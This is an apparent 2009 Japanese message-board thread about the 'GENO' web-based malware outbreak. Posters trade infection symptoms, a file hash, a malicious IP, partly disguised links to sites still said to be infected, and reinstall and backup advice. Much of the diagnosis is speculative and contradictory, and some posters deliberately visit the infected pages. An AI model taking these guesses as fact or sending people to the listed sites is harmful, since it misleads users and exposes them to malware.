尚、その人からの7.X系や9.Xに関しての報告はあの時点では無かった筈。
もしかして貴方があの報告をしてくれた人なのかも知れないけどw
俺も踏んだとき、ページファイル食わされただけだった その後、確認されている感染現象は大抵チェックしたし、普段使っていておかしなところもない ページファイルはウィルスというよりJavaScriptの問題なのかな? ブラウザに異常があっても、感染していないケースがあってもいいと思いたい 最近クリーンインストールしていたので、リーダー、FlashPlayer、WindowsUpdateは多分最新
>>659 ここ数年でも最凶レベルだと思う
このクラスのゼロデイアタックは滅多にないんじゃない?
ある程度のセキュリティ対策してる人でも余裕で感染するし
adobeのソフトウェアは入れてる人が多い割にはアップデートあんまりしない人が多いしな
>>666 その可能性もゼロではないけど、正直なんともいえないな。
ちなみにうちはProExtend9.1でなんども踏みまくってるけど、全然無問題。
ゼロデイじゃないけどな。 しかしPDFが貼られていないページ参照でもPDFの脆弱性を突かれるとは盲点だった・・
679 :
615 :2009/04/09(木) 23:24:31
>>666 感染したかどうかはわかりません。
ただ、今まででいてる検証ではなにも問題がでていません。
でもだからといっても安心もできないわけで・・・
>>669 ノートン先生もスルーして検体すら採取出来ずに終わった。
最終的にハングって再起動→ブルースクリーンのコンボを食らった。
ぶっちゃけ、セキュ板かソフトウェア板あたりのスレに張られていたリンクを踏んで食らったんですよ。
この件があってから Reader8から Reader9.1にした
682 :
676 :2009/04/09(木) 23:27:56
>>678 そうか。なんか噂じゃ現地時間の四月二日のカナダ産って聞いたから
んでGENOが攻撃受けたのが日本の四月四日の朝だっけ
ただその前にも外国ではあったみたいだしよくわからん(三月末辺り?)
Adobe readerは9.1にアップデートしようとするとインストールモジュールが 70MB超なのがダルい。 この容量のせいでアップデート面倒くさがる人が多いんだろうなと思う(俺含め) たかがReaderの分際で・・・
>>682 脆弱性の指摘は2008/08〜
u.batの存在は2009/01〜
感染報告は2009/03/28〜
そもそもpdfが重いから嫌い、って人多いしね 見れなきゃ困るから一応入れとくけど更新はしないor更新に気がつかない、ってのが大半な気がする
今年に入って必死にスパム送りまくってロガーからftp手動で頑張って流行らそうとしてるktがいるんだろ
>>682 恐らく、同じ脆弱性を突く別のものなんじゃないかね。
で、これは使えるwwwwって、ラトビアの人が改造してばら撒いたと。
まぁ、こんな感じだから、なんとかクリーンインストールを避けたくて
ここ見に来る人も、面倒臭がらずに入れ直した方が良いよ。
あれこれやって時間だけ食って、結局入れなおす羽目になるから。
しかし、Adobe ReaderとFlash Playerの脆弱性か。これは確かに
盲点だなぁ。WinUpdateと比べて自己主張しないし、実害ないだろって
自動アップデートも告知もOFFにしてる人多そうだ。
688 :
名無しさん@お腹いっぱい。 :2009/04/09(木) 23:38:05
4月から会社のIT委員(IT部門のような専門家じゃない)になったら いきなりウイルス騒動でてんてこまい。 GENOの話も今日知ったので、アドビのうpdateするようにいわなきゃ。
689 :
664 :2009/04/09(木) 23:38:18
>>666 >>667 >>674 flashの方の脆弱性をつかれてる可能性もあるから切り分けが難しいな…
ちなみにLinux上のFirefoxでも踏んだら落ちる。
メモリをバカ食いするのは、メモリを食いまくるようなコードになっているため。
sqlsodbc.chmの改変がないところを見ると
>>664 で正しいような気もするが…
もし他の感染例があったら報告頼む
>>687 いい勉強になったよ、確かに意識が低すぎたと反省しきり
脆弱性に関するニュースはちゃんとチェックしなきゃと痛感
このウィルスって、 メモリ馬鹿食いさせて、メモリ上のアプリを落とす。 再起動した時にメモリ上のexeを乗っ取って悪さをする。 La.exeや8lv.exe自体はウィルス的な挙動を行わず、 あくまでもメモリ上で乗っ取ったWindowsのexeで ウィルス的な挙動をさせるってことだよね? だから大元のファイルを特定できず、アンチウィルスソフトも 右往左往してるってことで合ってる?
>>669 ちなみにちょっと思い出したけど、
確か食らったのはソフトウェア板のPerfectDiskスレの現行の一つ前のスレ内のリンクだったと思う。
ギコナビのログも採取出来なかったんで、レス番等の詳細も追えない。
で、ウィルスの挙動に関しては正直今回のGenoウィルスに結構似てて、
Regeditやメモ帳等Windows標準アプリがジャックされて起動不能になって
ProcessExplorerで確認しつつ、いじくるツールでレジストリの起動系キーを確認してる間に
Document and Settings内のファイルがジャンジャン消されてハング。
マイドキュメント内のデータが少なかった事が仇となった様で即効でハングした。
ウィルス本体よりも、むしろこれほどまでのウィルスを製作した奴がどんな人間なのか知りたい まさか元Adobe社員のプログラマとかないだろうな
+から飛来したか
あ、あと、おいらが食らったウィルスはタスクマネージャーもジャックして起動出来なかったわ。 参考までに報告。
697 :
名無しさん@お腹いっぱい。 :2009/04/09(木) 23:53:30
最強のウィルスってのは人知れずコソーリ活動するものじゃないのか?
>>693 システム破壊系のウイルスなんて過去に腐るほどあるだろ・・・
>>697 感染力が強くて被害がでかい割にコソーリ活動するのが最強だな
今回は感染力は普通だけど2ちゃんねらの短縮URL&GENOの対応の遅れで感染力が大幅アップ
そもそもウイルスに最強とかないだろw
むしろ最近キンタマ、オンゲの垢抜きとかいうように多様化しただけで 昔はウイルス=破壊というようなイメージしかなかった
>>700 そういうのを格付けしたくなる年頃なんだろ
>>698 昔からある典型的なタイプだけど、恐らく一部バイナリ改変して
当時のノートン先生等をクリアしちゃう様にしてた物を踏んだんだと思う。
どうせ検出されるだろうと高をくくって踏んだら食らっちゃいましたってお話。
ノートン先生を過信しすぎてたw
>>702 普通にクラッカーってどこで知識つけるか知りたいんだが
>>705 ナビスコのオレオを沢山食べると腕が上がるって言ってたよw
ニコ動で動画再生するとCPU使用率が 50前後ぐらいいくんだけど元々、そんなもんかねぇ
性質の悪いウイルスなら知ってるけど最強のウイルスはしらない
(* >ω<)=3プー
>>709 皆は君のCPUが何か知らないからエスパーに聞くといい。
714 :
709 :2009/04/10(金) 00:33:30
>>713 >>709 は私だ(* >ω<)=3プー
>>712 あぁ、やっぱりそうですよね、すみません
x86 Family 15 Model 79 Stepping 1 AuthenticAMD ~2204 Mhz
これがCPUでしょうか?
合計物理メモリってのが 1,024,00MB
利用可能な物理メモリが354,19MB
合計仮想メモリ 2,00GB
こんな感じです
Readerは7系の最新だったけどflashが10.0.10〜ぐらいで最新でなく
楽天系のブログ見てて記事押しても
表示されない変なブログがあったのが気がかり
ハッシュは
>>84 と一緒なんですけど
・・・・
OS再インスコしとけ(* >ω<)=3プー
( * > ω < ) = 3 フ ゚ ー
719 :
615 :2009/04/10(金) 00:51:12
>>715 flashのバージョンおぼえてないけど
なんか助かってる気もするけど・・・大丈夫と断定できないのがかなし。
インスコ・・・面倒やなぁ
721 :
615 :2009/04/10(金) 00:54:52
もしも GENOウイルスが感染してるとして 問題なのはCドライブだけですかね? パーティションきってるんですが他のドライブは・・ 再インスコしたかたはどうしてますか?
関係ないけど私のDELLもパーティションきってあるけど DELL自体のシステム専用みたいなパーティションとかあって 素人だし意味がわかんないからサポに送ったよー すっからかんになるみたいw
>>721 あくまで一般論でしか言えないけど、可能であれば当然全部フォーマットしなおすべきだし、
可能であればパーティションも再度切りなおすべき。
また、RAIDを組んでてストライピングやミラーリングを行っている場合は
パーティションを切りなおす以前にRAIDボリュームまで新たに組みなおすべき。
基本的にBIOSから認識される順で、1台目のHDDにマスターブートレコードが保存されているんだけど
その部分にも感染するウィルスの場合だと本当に厄介で、
原則的にはパーティションから切りなおして全てのドライブをフォーマットする感じになる。
今の所判ってる範囲ではこのGenoウィルスはそこまでしないウィルスだとは思うし、
単純にXPのシステム復元から復帰出来た人もいる様なので、そこまで気にしなくても大丈夫だとは思うけどね。
それに最近はUSBメモリの普通のブートレコードにも感染するウィルスとか、色々ある位なんで、
本来、原理原則に則って完璧に対処するのであれば、2台目等の複数のHDDを搭載している場合も
可能な限り一通りパーティションを切りなおす所から始めたほうが良いかと。
基本的にパーティションを切りなおす事で正しいブートレコードに書き換えられるんで。
ただ、実際にはどうしても消せない秘蔵エロ動画等のデータがDドライブにある等、止むを得ない場合は
キーロガー等が最悪残ってしまう等のリスクを承知の上で
Cドライブだけをフォーマットする形でお茶を濁すのもアリかと。
その上でXPやVistaを再インストールが完了した後に最新定義ファイルに更新したアンチウィルスソフトで
フルスキャンしてウィルスの残留の有無をチェックしたりして。
ぶっちゃけ、一度それで試して駄目ならその時にもう一度再セットアップを行って全部のドライブを消せばよいんだし。
二度手間になる可能性はあるけどね。
悔しいですっ!!
なげえ 2-4パラグラフは蛇足だな
うんうんw 酔ってるから無駄に長文で無駄に駄文になってるわw
>>727 うちはSSDを使ってるからデフラグは無理w
732 :
名無しさん@お腹いっぱい。 :2009/04/10(金) 01:42:57
>728 じゃあローレベルフォーマットで
>>729 うちは確かレスに書かれてた記載コードを入れて食らった。
多分、コードを書き換えられたりしてて開けられないのかも知れないな。
GENOウイルスが人体に与える影響も解析したほうがいいな
>>731 実は何回かSSDにもデフラグ行ってるw
ただ、自作PC板のSSDスレ等で半分誤って書かれているのは
既存のデフラグソフトとは違って、
SSDの内部的に配置までちゃんと書き換えてくれる、
いわばSSD対応デフラグみたいな奴じゃないと殆ど意味無いんですよ。
SSDはHDDと違って、コントローラーがテキトーに割り振って
OSや通常のデフラグソフト上から見える位置とは全然異なる部分にデータを書き込んでるんで、
テキトーなコントローラーに騙されない
賢いデフラグソフトじゃないとSSDでは無意味なの。
>>735 多分想像付いてると思うけど、食らった時も酔ってたんだよw
で、確かパスを入れたらその時点で食らった筈なんだよね。
ZIPの解凍はしないでウィルスを食らった筈。
>>736 誰かさんの逃避ダイアリーに書いてあったな
>>737 んなはずあるかよwwwww
ちゃんとヘッダはPKだっつーのwww
>>735 今恐る恐る踏んでZIPを落としたけどなんか感染した当時と異なってる感じだな。
今はなんかZIP中のKEYGEN.EXEにパスが掛かってるけど、そもそもあんなんじゃなかった筈。
ZIP自体がリプレースされているのかも。
ああ、クリーンインストール終わって やっと復帰したと思ったら今度はPCIDevice認識しないだRealTEKのオンボード 音源から音が出ないやらで大変です。パソ工のBTOパソコンは再インストール時に 音源を殺す設定がついているのでしょうかね。
ちなみに
>>729 のZIPもノートン先生無反応だな。
念のため扱いには十分注意してね。
>>743 ちょ
パスマジ気になるから解凍できたのなら教えて
>>721 もし問題がおきてから、C→他のドライブにファイルの移動とか
やってたらそのファイルに感染がある場合、広がる可能性もあるんじゃない?
基本パーティション切ってんなら、隔絶した空間だよな?(間違ってるかこの認識?)
748 :
746 :2009/04/10(金) 02:14:08
あ、上で詳しい解説あったか 失礼
>>746 最悪、傷口を広げて元の木阿弥になる可能性もあるよ。
だから完全にパーティションレベルから切り直してやらない限り
キーロガー等が残存しちゃう可能性はゼロではないの。
>>747 pikazipめんどい!
5桁で出なかったから投げた
ちょwwwww数字とかwwwww
とりあえずバックアップしたいんなら 感染が疑われるドライブ or パーティションからシステムを起動させるのを避けて 別のドライブ or パーティションからOS立ち上げて作業したほうが無難
酔っぱらっるって Pikazipが使えてなんでどう考えてもkeygenっぽくない(コンソールアプリっぽい)ファイル開いちまうんだよwww ちなみにばっちりウイルスでした
おやすみ 大体出尽くした感じだね またなんかあったら繰る歯
>>752 だね。
てか、複数台のPCがある奴なら別のPCでアンチウィルスソフトのレスキューブートCD等をこしらえて、
再起動前にそいつでCD起動してブートセクタから何から一切合財スキャンしてチェックするのが望ましいね。
>>753 うちの環境だとPikaZipは入れてなくてLhaplusでしかパス解析出来ないけど、
そもそも酔ってるのに一々そんな事までして食らう訳ないだろw
ほぼワンクリックで食らったんだってのw
>>754 おやすも。
俺おそらく感染してるんだけどsqlsodbc.chmはMD5:f639afde02547603a3d3930ee4bf8c12だった svchostは5個中2個がNETWORKSERVICEでうごいてる ちなみにカスペルスキーのオンラインスキャンのアップデートが途中でエラーでてできない
判定の仕方がいまだにあいまいなのは非常に困った
760 :
名無しさん@お腹いっぱい。 :2009/04/10(金) 08:02:00
◆W07s5cWHb. が、いろんなレスしてる俺カッコいい!! こんな事も知ってる俺すごい!と自己陶酔してるのがきもいネ!
妬み
でも何一つ解決してないよ
>>763 問題を解決する上で自称ニュー速民は必要かね?w
765 :
615 :2009/04/10(金) 08:26:10
問題のjsファイルも殆ど対応したし あらゆるプロセスを乗っ取ることもわかったしこれ以上なにをしろと
感染判定の確定情報ってある?
>>758 オンラインスキャンがハングで落ちるわけでないならそのハッシュは正常なので感染を何らかの理由で防いでるのかも
>>191 >以下のサイト(有名な駆除ツール)にアクセスできなければ危険
これってexeが落ちてきたら安心なのかな?
sqlsodbc.chmのMD5は先に確認したけど。
>>758 > ちなみにカスペルスキーのオンラインスキャンのアップデートが途中でエラーでてできない
俺も同じく、途中でエラー。
そこで、カスペルスキースキャンエンジンを採用している、niftyオンラインスキャンに移動、
ここでは問題なかった。
771 :
名無しさん@お腹いっぱい。 :2009/04/10(金) 08:53:50
773 :
156 :2009/04/10(金) 10:23:45
>>667 こっちはreaderも何も変な動きが無い
CPUは0~2%くらいだしメモリも600M程度
775 :
156 :2009/04/10(金) 10:30:26
あ、そういや俺もカスペルスキーオンラインスキャンが出来ないわ
776 :
名無しさん@お腹いっぱい。 :2009/04/10(金) 10:33:20
msとアンチウイルスサイトに繋がりません かんせんですか?
>>776 このウイルスは特定サイトに繋がらないんじゃなくて、
極端に繋がりにくくなるだけ。
何度も何度も試せば繋がるよ。
778 :
名無しさん@お腹いっぱい。 :2009/04/10(金) 10:44:43
まったく駄目です あとイーモバイルで接続すると凄いポートスキャンでCPU使用率100パーになります
てst
>>772 正確には感染していた、の方が正しいんじゃない?
www.rakuten.ne.jp/gold/i-na/が感染してたと話題が上がってて今は何事もなかったように営業してるし、
慌てて楽天がなんらかの処置を施したのかと
楽天のサーバーがハッキングされたとして他の店も同時多発的にやられてたとしても不思議じゃないよ
各サイトが対策を施すのは待つしかないとして・・・ ウィルス対策ソフトメーカーの対応状況はどうなってるか誰か教えて。
土曜のウィルス報告が上がる前にIE/firefox/chromeで突撃してすべて落ちたけど無害ですんだ XPhomeのavast常駐でreaderが9.0.0だった
>>770 サンクス!
niftyのオンラインスキャンできた
感染は0だったけどロックされてますってのが実に怪しいw
>>780 デスヨネー
ただ他の店舗でも発生してればもうちょっと情報出てくるよね。
どうもSQLインジェクションとかではなくて
FTPのパスワードを抜かれたか簡単過ぎて推測されただけのような希ガス
crestronjapan.com 、対策されてるっぽくね? 既出?
まだ残ってる
無能な鯖管は消えろ!
アヴァイラが親玉と思われるをファイル解析後、個人情報を盗むPSW系のトロイという結果がでてるな カスペじゃ無害と言われたのに リネームしてもう一回提出してみる 大きな進展w
>>786 ごめんソースにまんま残ってたわw
NoScriptのメニューだけで判断してた('A`)
>>789 トップページ
www.crestronjapan●com/
まだ残ってる ラトビアに飛ばされた
逆アセンブルとか言ってる痛い子がちらほらと
まだ気付いてないのかな? 連絡してあげたいが、PC素人だから無理ぽ('A`)
>>794 クレストロンジャパンへは報告済みだよ。
向こうが対処してないだけ。
797 :
792 :2009/04/10(金) 12:09:21
11:59:08のログから ZoneAlarm Security Suite は、あなたのコンピュータから リモート コンピュータ: IP アドレス 94.247.2.195、ポート 80 への通信をブロックしました。 この警告は、ZoneAlarm Security Suite が完全に開始する前にプログラムがインターネットへの 接続をすると発生することがあります。
799 :
名無しさん@お腹いっぱい。 :2009/04/10(金) 12:13:32
>>798 すげーのはてめーの頭の構造だよ
糞虫湧いてるくせに調子に乗るな
会社によっては自社ホームページをスタートページに設定しているところもあるだろうに この社内ではウイルスが蔓延していないのか?
xp使用、旧tepco光、バッファローの有線ルータ ポート445無効にしたらネット接続出来なくなったため 元に戻したいのですが、どれを選べばいいでしょうか。 システムとか要求とか自動とかあるので 無効以外でこれにしとけというのはありますでしょうか
ポッポー (´ \ | __________/ヽ / .l l \| | !ノートン先生 ! //U ヽ___/ パソコン蛾人 \ !!大激怒!! // U :::U: ぶっ壊れ(__) \ !!!!! / // ___ \ ::: たお! (__) \∧∧∧∧/ | | | U :::: (`Д´#) < ぶ パ > |U | | ::U: _| ̄ ̄||_)_ < っ ソ > | ├―-┤ U.....:::: /旦|――||// /| < 壊 コ > ヽ .....::::::::: ─────────< れ ン >────────── < _,ノ , 、ヽ、_ ノ< た 蛾> プスプスプス・・・・・∬∬ (y○')`ヽ) ( ´(y○')< !!! >踏んじゃったよぉ___ ⌒ / ヽ⌒ /∨∨∨∨\ ∧_∧ ||\ うわあ |~ ̄ ̄~.|ぁぁ/パソコン蛾ぶ \ ( ;´Д`) || | ぁぁ| |||! i: |||! !|ぁ/っ壊れた!ディス \( つ/ ̄||/ ぁぁ| |||| !! !!||| :|/プレイが砕け散った! \ヽ |二二二」
804 :
名無しさん@お腹いっぱい。 :2009/04/10(金) 12:23:37
_,,....,,_ _人人人人人人人人人人人人人人人_ -''":::::::::::::`''> ゆっくり オマンコ みていってね!! < ヽ::::::::::::::::::::: ̄^Y^Y^Y^Y^Y^Y^Y^Y^Y^Y^Y^Y^Y^Y^ ̄ |::::::;ノ´ ̄\:::::::::::\_,. -‐ァ __ _____ ______ |::::ノ ヽ、ヽr-r'"´ (.__ ,´ _,, '-´ ̄ ̄`-ゝ 、_ イ、 _,.!イ_ _,.ヘーァ'二ハ二ヽ、へ,_7 'r ´ ヽ、ン、 ::::::rー''7コ-‐'"´ ; ', `ヽ/`7 ,'==─- -─==', i r-'ァ'"´/ /! ハ ハ ! iヾ_ノ i イ iゝ、イ人レ/_ルヽイ i | !イ´ ,' | /__,.!/ V 、!__ハ ,' ,ゝ レリイi (ヒ_] ヒ_ン ).| .|、i .|| `! !/レi' (ヒ_] ヒ_ン レ'i ノ !Y!"" ,___, "" 「 !ノ i | ,' ノ !'" ,___, "' i .レ' L.',. ヽ _ン L」 ノ| .| ( ,ハ ヽ _ン 人! | ||ヽ、 ,イ| ||イ| / ,.ヘ,)、 )>,、 _____, ,.イ ハ レ ル` ー--─ ´ルレ レ´
>>780 www.rakuten.ne.jp/gold/以下は楽天の提供しているシステムじゃなくて
サーバ貸しに近い形態だったからまあ、なんつーか....
慌てて何か対処したかもわからんね
だいぶ静かになった?
>>799 なるほど、これがセキュ板に常駐する基地外ウイルスか
810 :
名無しさん@お腹いっぱい。 :2009/04/10(金) 12:56:31
そんなに似てねーぞ
>>807 まだまだでしょ。
ただ、これ、アンチウィルスソフトが殆ど対応したから新たな被害者はあまり出ないと思うけど、
鯖側の感染数が減らないと、逆にブラクラ同然のサイトが増えるだけなんだよね。
管理者不在公開鯖がこれだけ多いと厳しいな。
未だになんのアクションもしないで放置している某者みたいなところ、結構多いと思うよ。
アフォしかいないから杜撰な管理→杜撰だからクラックされる→アフォだから対処不能→放置
この最悪コンボなんだよな。
本当なら行政処分しないといけないレベル。
812 :
名無しさん@お腹いっぱい。 :2009/04/10(金) 13:32:04
三日間も放置した挙句、キャッシュをクリアで 事を済まそうとする適当さが許せん。
次スレはいらないから建てるなよ そろそろ過疎ってくるしここIDでないから。 変なのも湧くしやるなら他でやれ
>>813 おまえが来なきゃいいだけだろ
建てられると困ることでもあるのか?
815 :
名無しさん@お腹いっぱい。 :2009/04/10(金) 13:51:27
>>813 わかりました、もう次スレ用意しろって事ですね?
816 :
名無しさん@お腹いっぱい。 :2009/04/10(金) 13:53:52
関係ないけどHotmail.comがおかしくなってるな。
818 :
名無しさん@お腹いっぱい。 :2009/04/10(金) 14:03:33
>>814 次スレ建てても消化出来ないだろ
ID出ないし荒れるだけ
馬鹿共死ねってことだよ
理解しろ
なにこいつw
まだ懲りないらしい
821 :
名無しさん@お腹いっぱい。 :2009/04/10(金) 14:06:06
うんこ
ただの基地外、もしくは工作員だって田宮さんが言ってた
ですよねー
変なとこにレスしてしまった
まぁ、これだけスレに常駐してる奴が居るんだから 火消ししても無駄だと思うよ。 多分、雑談スレ化しながら各Genoスレのヲチスレとなったり 新たに食らった痛いサイトを嘲笑うスレになると思うw
このスレを見ているといかにセキュ板の住民が情報強者かわかる ν速なんか情弱しかいないからなぁ やっぱりみんなで守っていかないと駄目だな。 今のν速はw
しねとかいっちゃだめだよー なかよくね
GENOの営業が再開した月曜日から各地のGENOスレで もういらないだろ的な書き込みを始めてるんでスルーしてあげてくれ
マカフィーは対応してるの? ウィルス名は何?
831 :
名無しさん@お腹いっぱい。 :2009/04/10(金) 14:22:03
>>817 サンクス。
なにか不具合でサイトが落ちてたみたい。
今アクセスしたら復旧してた。
しかし想像以上にタチの悪いウイルスだな。
833 :
名無しさん@お腹いっぱい。 :2009/04/10(金) 14:35:37
3日の夜にGeno踏んで7日に知ったんだが、もらってんのかな?火狐2でflashもadbeも最新ではなかった。 sqlsodbc.chmはハッシュ改変なし。火狐もIEも落ちない。カスペルではnyとshareが不正なアドオンとでて、E-mailワームが1個でてそのファイルは削除。トロイは出なかった。コマンドプロントは7日にあけちゃったけど、まずかったのか。 気になるのが、火狐で見てて、何も開いたりしてないのに、1秒置きにCPU(セレM420)使用率が7〜100%間を行き来するんだけど。潜伏してて何かされてるって可能性ある?
835 :
156 :2009/04/10(金) 14:46:32
たまにDEPでexproler.exeが落ちてシステムの復元も出来ない オワタ?
>>833 ,835
もうマジで、クリーンインストしたほうがいいと思うよ。
>>835 発病してるw
うpでーとできる?
出来なきゃ当確
割れ房はアップデートがそもそも出来ない件
>>835 それは多分ご愁傷様かとw
とっとと必要なデータをDVD-Rにでも焼いた後にクリーンインストールだな。
841 :
名無しさん@お腹いっぱい。 :2009/04/10(金) 14:59:09
フリーでDtoD、リカバリー領域をHDDに作成するツールないかな・・・ ドライバ、ソフト入れなおすの面倒なんだぜ
>>839 ファイル名を指定して実行→regeditが起動する?
でも
>>156 さんはReaderが8.1.4ならば脆弱性修正版
Flash Playerも最新版だったとのことですけど
それでも感染したということかな
>>840 HDDも一個しかないしDVDだってあああああああああああああああああああああああ
>>842 できる・・・
全容がわからないってのは不気味だな
>>844 白とは言い切れないけど黒でもなさそう
グレー
感染は否定出来ないけど発病はしてないってとこか
今から踏もうと思う XP SP2パッチなし Flash最新版 adobe readerは入れてない
848 :
◆W07s5cWHb. :2009/04/10(金) 15:10:47
>>838 最近の割れ厨はもともと無料なReaderまで割るのかw
>>844 genoウイルスじゃなくて別のやつって可能性もあるね
850 :
833 :2009/04/10(金) 15:45:10
そーいえばwindowsもraederもflashもアップデートは問題なくできた。 結局、主な感染の兆候は無いんだけど、CPU使用率がなんか気になるんだよね。 1秒置きにCPU使用率が7〜100%間を行き来するんだけど、これってセレM420ぐらいだと普通の挙動?
>>838 WGAなんて大昔にクラックされてるぜw
普通に正規品として通過する
853 :
833 :2009/04/10(金) 15:55:32
regedit試した。問題なく起動。踏んだ時flashは9.0でreaderが7で最新ではなかったけど、Geno踏んだのが4日になる前だから微妙なんだよな。報告出だした4日10時前ならギリセーフなのだろうか・・・?
Hijack Thisで調べてみたら?
>>853 それ同じインスト環境だ
5日早朝踏んで再起時に終了プロセスの確認出て(開いてないpdf
再起したけどブルースクリーンにはならず
6日にGENOヴィルス知ってバックアップから復元してんで他は不明
>853 てかお前、P2Pやってんのな。 リカバリ推奨
>>853 少なくても4日10時頃なんてのは殆ど大本営発表レベルなんて信じたら負けってレベル。
少なくてもスレ上で最初に報告してた奴が書き込んだ時間がその頃ってだけで、なんの保証も無いから。
で、Genoも恐らくまともに調べずにスレの内容を都合よくテキトーに纏めて無断転載しているに等しいレベル。
結局、
>>660 の通りってこった。
>>853 4日午前3時にはどっかのスレで報告があった
それより前だとわからんけどP2Pなら他のに感染してるんだろ
>>857 あ、そうだったっけか。こりゃまた失礼。
GENO踏んだ時のログ(キングソフト) 助かったのか… 2009-04-04 12:42:15 ブラウザはバックグランドでファイルC:\DOCUME~1\USER1~~1\Temp\wJQs.exeをダウンロードしました 2009-04-04 12:42:16 ブラウザはバックグランドでファイルC:\DOCUME~1\USER1~~1\Temp\wJQs.exeをダウンロードしました 2009-04-04 12:42:38 ブラウザ上の疑わしいモジュールC:\DOCUME~1\USER1~~1\Temp\wJQs.exeの実行がブロックされました。
まだ感染しっぱなしのサイトあるね…。 今は接続先は死んでるからデータ吸出しの被害は無いと思うけど、 接続先っていつ死んだんだろ…?
863 :
名無しさん@お腹いっぱい。 :2009/04/10(金) 16:19:18
wJQs.exe の検索結果 約 1,680 件中 1 - 100 件目 (0.40 秒)
864 :
名無しさん@お腹いっぱい。 :2009/04/10(金) 16:22:21
>862 突撃したらFirefoxクラッシュしたぞ
でもGENOの対応には目を疑います。 せめて『リカバリして下さい』だったらな。 あと、リカバリせずになんとかして駆除しようと頑張ってる人もいるらしいが、 リカバリ自体特別難しいことじゃないですよ。 取り説に方法載ってるんですから。 リカバリしたくないという理由は… 1・リカバリディスクがない 2・取り説なくした 3・バックアップを取ってない 4・取り説読んでもよく分からない 他にもあるんだろうけどよ、1のケースならHDDのリカバリ領域から リカバリできるのであれば、そこからリカバリすれば良い。 2のケースなら、画面の指示に従っていけば良い。 3のケースなら、即座にバックアップを取るか(バックアップ自体も難しくない) 全てを諦める。 4のケースなら、電気店に直接持ち込んでしてもらう。
866 :
名無しさん@お腹いっぱい。 :2009/04/10(金) 16:26:11
ttpも抜けよ 専ブラだと普通にリンクされとるわ
868 :
833 :2009/04/10(金) 16:32:40
>>865 USBメモリにでもバックアップしたい・・・んだがこのウイルスが入ってきそうで怖い
>866 たしかに問題のコードがありますね。 俺の環境ではIEで踏んでも問題ありませんが、 他の人はアクセスなさらないように。 >869 USBメモリにバックアップと一緒に入ってしまいそうで怖いのであれば、 やはり、全部諦めろ。という答えしかできません。
>>869 ぶっちゃけ、このGonoウィルスは
PDFやFlashの脆弱性を突いてこれらを直に使わないサイトを経由して
強引に感染させちゃうという、斜め上の発想のウィルスなんで、
まだ中身のEXEファイルの解析が完了せず、
処理内容の全貌が明らかになっていない現状では
ちょっとUSBメモリを使用するのはリスキーだよね。
最終的に焼き捨てになるけど、
焼きソフトを使ってCD-RやDVD-R等に焼いた方がまだ安心出来る。
GENO以外で感染の危険性もある(あった)んだから、 ウイルス感染のはっきりした確認方法がないのが厳しい。
873 :
名無しさん@お腹いっぱい。 :2009/04/10(金) 17:05:26
評判の良い焼きソフト教えてくだしあ><
>>876 感染PCでそれが動かなくて途方にくれてるんだけど
ggrks
>>877 ご愁傷様ですw
てか、どういう挙動なの?
他の別途インストールしたアプリから何から全滅ってのならまだ判るけど、
imgburnだけが起動しないって事なの?
>>879 全滅じゃないよ 特定のソフトが起動しない
>>880 YesNoで答えて。
1.imgburnが起動すらしないって事?
2.感染以前からimgburnを使ってて以前はちゃんと動作してた?
3.他のライティングソフトを試しても一様に起動しないのか?
もう終わったウイルスだから次スレ必要ないな そもそもどこもgenoウイルスなんて言ってないし 名誉毀損も肌々しい
>>880 ついでに参考までに聞きたいけど、
実際に試して動かなかったソフトがあれば
判っている範囲で良いから列挙してちょうだいな。
>>882 もう少し気の利いたこと言ってくれよ。
わかりやすすぎるだろ
大変だね〜がんばって汚名挽回してね〜
y y 数年愛用 他のライティングは試してない いろんなソフトで影響がでている。
GENOの対応は悪いが一番悪いのがGENOって感じの流れで笑える なんだよGENOウイルスってw
>>876 ありがとう
うう・・・クリーンインスコ辛いお・・・
いやあ店員さんも必死だねぇ
>>886 レポートどうも。
それだと多分アレだね。レジストリの関連付けとか項目等をグチャクチャにされてしまっているのか、
Explorer.exeが乗っ取られてると、その種のバックアップ等を行えないように
Windows上の特定の機能を殺しちゃってるのかも知れないな。
>>889 こんなウイルスに引っかかって本当に間抜けな奴だな
お前はw
>>882 おつかれさまです
お詫びとかどうでもいいんでサーバ側の侵入経路と対策
教えていただけませんか?
>>883 eBoostr
ホームページビルダー
クリップボード系のアプリ
IE FireFox
ISOを弄くる系のツール
タスクトレイのスタートアップは半分以下しか表示してない
まともに弄る気もなくすくらい使い物にならないから
放置してるw
>>894 Skypeやメッセンジャーみたいな通信ソフトは動く?
ボットネットってIRC使ってなんかやってた話があったけど
IRC関連ソフトもどうかな
インストールされてないならスルーでおkれす
このウイルスまじぱねぇ・・・ 即死しないのが余計に辛い 「楽にしてくれ」って気持ちがわかってくるまじでw
>>894 そこまでやられたらアメリカなら確実に訴訟を起こしちゃうレベルだよなw
もし複数台のPCがあればそっちのPCのアンチウィルスソフトを最新にして
LAN越しにコピーしてウィルスをそっちのPCで駆除して貰いながら
データを移してしまえば良いかと思ったんだけど、
もしかするとライティングソフトの動作を阻害する位なら
普通LAN越しにコピー出来ない様にされちゃってるかも知れないな。
本当に辛いな。その状況は。
とりあえずIDでないから名前だけでも付けとくわ
>>880 >>894 とかは俺ね
>>895 MSNメッセは使えた
そのほかはインストールしてないからわかんない
「このまま使い続けても大丈夫かも・・」と思わせる所があるかもね。 発病してなくてもゴミが残ってるかもしれないのが嫌だ。 クリーンインストールって言葉が実に良く出来てると実感w
>>898 ちょっと気になっただけなんだが情報thx
ああでもその状態でメッセログインは危ないかも
気をつけてね
なんかぶっ飛んだ憶測でスレが進行してますが(笑 誰も突っ込まないあたり感染実験してた人たちはいなくなっちゃったのかな
>>900 そうなのよ
再インストールするにも、4年もごちゃごちゃ使ったOSで
バックアップ作業が困難なんだわ。
なので、セキュリティーソフトの神対応を待つ事にしてる。
でもOSが破壊されてるのはわかってるんだ・・・(遠い目
>ボットネットってIRC !!?
>>903 いや、被害者なのが判ってるならクリーンインストールしなよw
あと、蛇足ながら一言言うと バックアップ時にFTPだけは仮に使えても極力使わないほうがいいと思う。 Explorer.exeがジャックされてウィルスをまともに食らってる状態だと FTPログイン先やアカウント名、パスワード等が クラッカーに漏れる可能性も十分にあり得そう。 で、クラッカーにそのログイン先のターゲットにされてしまうと。 接続先がイントラのFTP鯖だとその点どうにかなるかもしれないけど。
>>897 他のPCからアクセスするのも怖いw
といっても、ルーターですでに繋がってるけどね。
とりあえずUSBメモリにデータ入れる事はできたから
最悪はUSBメモリでバックアップしてOS入れなおす事にするよ
GENOって結局本当にウイルスばらまいてたの? 感染の確認方法いまだにちゃんとでてないけど ウイルスってやっぱりデマだったの?
